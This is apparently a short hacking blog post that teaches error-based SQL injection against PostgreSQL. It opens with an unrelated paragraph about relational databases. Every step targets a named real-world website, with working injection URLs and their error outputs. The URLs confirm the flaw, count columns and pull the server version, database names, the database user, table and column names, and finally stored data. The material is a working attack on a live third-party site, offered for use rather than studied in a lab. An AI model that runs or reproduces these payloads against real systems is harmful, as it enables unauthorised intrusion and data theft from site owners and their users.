SQL Manual Very Easy Method *
Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.
Lets start to play with Postgre:
we have a sql error based vulnerable website:1st Step find the vulnerability:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'ERROR: syntax error at or near “””
its mean this website can be injected.remember errors can varies you wont get the same error every time.2nd Step Columns count:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--get valid page
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.Lets try UNION SELECT query:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched Seems like UNION SELECT query is not working !!!
Lets try Errorbased Postgre SQLi…
3rd Step:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--ERROR: invalid input syntax for integer: “PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit” As we can see we got version of postgre DB server in the form of error.Lets move on and find database name.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: “scoutsqld”
Scoutsqld is 1st database name you can variey offset to get other databases names.
scoutsqld is first database we can get others by changing offset
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--Error Executing Database Query.
ERROR: invalid input syntax for integer: “template0″
template0 is 2nd database so you can increase offset till you got error.Lets find out the user:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: “postgres”
postgres is the user
Lets find the tables :>4th step:
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--Error Executing Database Query. ERROR: invalid input syntax for integer: “pg_type”
pg_type is first table we can get others by changing offset
5th step:Now we have to find the columns from our specific table !!!
e.g
our table is action
for that we have to use oracle char conversion.Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)
so our query is :
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--Error Executing Database Query.
ERROR: invalid input syntax for integer: ” typname “
And further you can find the columns using offset..Last step:
Now we have to extract data from our column .
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--Error Executing Database Query.
ERROR: invalid input syntax for integer: “bool”
0 comments:
Post a Comment